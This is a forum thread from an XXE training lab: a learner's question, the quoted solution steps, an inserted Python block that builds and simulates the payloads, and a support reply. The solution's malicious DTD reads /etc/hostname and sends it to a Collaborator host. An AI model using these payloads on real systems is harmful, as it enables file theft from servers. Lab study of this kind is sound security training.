
Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD

Chris Nov 02, 2019 08:06AM UTC

Hi, I'm having trouble with this lab. I think I'm doing it right but I'm not sure; every time I try it nothing happens. So the challenge is I need to use Burp Collaborator to get a DNS and HTTP response. I go to "Go to exploit server" and store my DTD file in the file. Then I get my URL and put it in this command: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> %xxe;]> Then I send it in Repeater and I look at my Burp Collaborator and click "Poll now", and nothing happens. Please let me know if I'm forgetting a step or something.



Using Burp Suite Professional, go to the Burp menu, and launch the Burp Collaborator client.

Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.

Place the Burp Collaborator payload into a malicious DTD file:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://I have put my subdomain.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;

Click "Go to exploit server" and save the malicious DTD file on your server. Click "View stored response" and take a note of the URL.

Then exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite. Insert the following external entity definition in between the XML declaration and the stockCheck element:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "I have put my url"> %xxe;]>

Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again.

You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the /etc/hostname file.
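As an added example (not code from the lab, from the solution text or from either post), the Python below builds the two payloads from the steps above and then models, offline, what a parser with external entity loading enabled does with them: which URIs it fetches, in what order, ending with the Collaborator request whose query string carries the file. The Collaborator host, the exploit-server URL and the file contents are placeholders, and the file content is constructed rather than read from a real system. `check_doctype` is a sanity check that the injected internal subset is well-formed with nothing trailing the closing `]>`.

```python
"""Blind XXE exfiltration via an external DTD: payload builder plus an offline
model of how a DTD-loading parser expands it.  Added example, not code from the
lab or the posts; host, exploit URL and file contents are caller placeholders."""
import re


def build_dtd(collaborator_host, target_file="/etc/hostname"):
    """The malicious DTD served from the exploit server.  A raw '%' in an entity
    value starts a parameter-entity reference, so the nested declaration spells
    it &#x25;.  Declaring `eval` expands %file; into the literal (fetching the
    file) and turns &#x25; into a plain '%'; only when %eval; is referenced is
    that text parsed as the <!ENTITY % exfil ...> declaration."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'http://{collaborator_host}/?x=%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def build_stock_check(dtd_url, product_id=1, store_id=1):
    """Stock-check body with the DOCTYPE inserted between the XML declaration
    and the stockCheck element, as the lab solution describes."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe;]>\n'
        f"<stockCheck><productId>{product_id}</productId>"
        f"<storeId>{store_id}</storeId></stockCheck>"
    )


_DOCTYPE = re.compile(r'<!DOCTYPE \w+ \[<!ENTITY % (\w+) SYSTEM "[^"]+"> %\1;\]>')


def check_doctype(xml_body):
    """True when the body has one well-formed internal subset followed directly
    by the root element; stray text after ]> (e.g. a second '%xxe;]>') means a
    malformed document, and a malformed document never triggers the fetch."""
    m = _DOCTYPE.search(xml_body)
    return bool(m) and xml_body[m.end():].lstrip().startswith("<")


# Parameter-entity declarations (SYSTEM or literal, either quote style) and refs.
_TOKEN = re.compile(
    r"<!ENTITY\s+%\s+(?P<name>\w+)\s+"
    r"(?:SYSTEM\s+(?:\"(?P<sys_dq>[^\"]*)\"|'(?P<sys_sq>[^']*)')"
    r"|\"(?P<lit_dq>[^\"]*)\"|'(?P<lit_sq>[^']*)')\s*>"
    r"|%(?P<ref>\w+);"
)
_IN_LITERAL = re.compile(r"&#x25;|%(\w+);")


def expand(document, resolve):
    """Model a parser with external entities enabled.  `resolve(uri)` returns the
    content behind a SYSTEM identifier.  Returns the URIs fetched, in order."""
    entities = {}  # name -> ("system", uri) or ("internal", replacement text)
    fetched = []

    def fetch(uri):
        fetched.append(uri)
        return resolve(uri)

    def replacement(name):
        kind, value = entities[name]
        return fetch(value) if kind == "system" else value

    def in_literal(m):
        # Char refs and PE refs are substituted while the literal is read
        # (XML 1.0 s4.4); the result is not rescanned for references.
        return "%" if m.group(0) == "&#x25;" else replacement(m.group(1))

    def process(text):
        for m in _TOKEN.finditer(text):
            if m.group("ref") is not None:
                process(replacement(m.group("ref")))  # "Included as PE"
                continue
            uri = m.group("sys_dq") if m.group("sys_dq") is not None else m.group("sys_sq")
            if uri is not None:
                entities[m.group("name")] = ("system", uri)
            else:
                lit = m.group("lit_dq") if m.group("lit_dq") is not None else m.group("lit_sq")
                entities[m.group("name")] = ("internal", _IN_LITERAL.sub(in_literal, lit))

    process(document)
    return fetched


def simulate_lab(collaborator_host, exploit_url, files):
    """Whole chain offline: the stock-check body pulls the DTD from the exploit
    server, the DTD reads the file and sends it to Collaborator.  `files` maps
    paths to constructed contents standing in for the target's filesystem."""
    dtd = build_dtd(collaborator_host)

    def resolve(uri):
        if uri == exploit_url:
            return dtd
        if uri.startswith("file://"):
            return files[uri[len("file://"):]]
        return ""  # Collaborator only has to log the request

    return expand(build_stock_check(exploit_url), resolve)
```

Calling `simulate_lab("YOUR-SUBDOMAIN.burpcollaborator.net", "https://YOUR-LAB-ID.web-security-academy.net/exploit", {"/etc/hostname": "constructed-hostname"})` returns three URIs, the exploit URL, then `file:///etc/hostname`, then `http://YOUR-SUBDOMAIN.burpcollaborator.net/?x=constructed-hostname`, which is the HTTP interaction you expect to see after "Poll now". Two caveats the model does not enforce but a real parser does: the chain only runs if the target's parser loads external DTDs and expands parameter entities, and the file contents are spliced into a URL, so a file containing a newline or other characters not allowed in a URI (most multi-line files) yields an invalid SYSTEM identifier and the final request never leaves. That is why the lab reads the single-line /etc/hostname.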


Ben Wright Nov 04, 2019 09:08AM UTC Support Center agent

Hi,

Thank you for your message.

The process you are following looks correct to me. I have just attempted this lab and was able to solve it using the solution provided so the lab is working correctly.

A couple of things to look out for:

Are you copying the full Burp Collaborator payload correctly? It should be something like http://qc62a6b7j69sdkfypp1g03murlxcl1.burpcollaborator.net

Are you copying the correct exploit URL? This should be the URL that is in the address bar after you click the View exploit button, i.e. something like https://acfb1fc51f86054780b0109501b3009b.web-security-academy.net/exploit

Lastly, we have had the occasional issue where users have copied the text directly from the solution (sometimes unrecognised characters have slipped into the text, which has affected the viability of the answer), so it is also worth typing out the various payloads etc. rather than copying them directly.

Please let us know if you need any further assistance.

